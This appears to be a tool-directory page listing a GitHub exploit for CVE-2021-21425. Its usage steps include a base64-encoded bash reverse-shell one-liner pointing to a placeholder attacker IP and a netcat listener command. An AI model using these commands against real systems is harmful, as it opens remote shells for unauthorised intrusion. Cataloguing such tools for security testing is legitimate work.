Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-21425 — Python exploit for CVE-2021-21425 that executes a reverse shell payload against a target IP, with instructions for setting up a netcat listener. | Kitploit
Tools/GitHubGitHub/afifudinmtop/cve-2021-21425
Payload GenerationExploitationWeb Application ExploitationCommand and ControlRemote Access Tool
GitHubafifudinmtop/cve-2021-21425

CVE-2021-21425

Python exploit for CVE-2021-21425 that executes a reverse shell payload against a target IP, with instructions for setting up a netcat listener.

View Repository
27 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2021-21425

source: https://www.exploit-db.com/exploits/49973
[1] change target ip
[2] change payload
echo -ne "bash -i >& /dev/tcp/OUR-IP/80 0>&1" | base64 -w0
[3] sudo nc -lvnp 80
[4] python3 exploit.py

Download Tool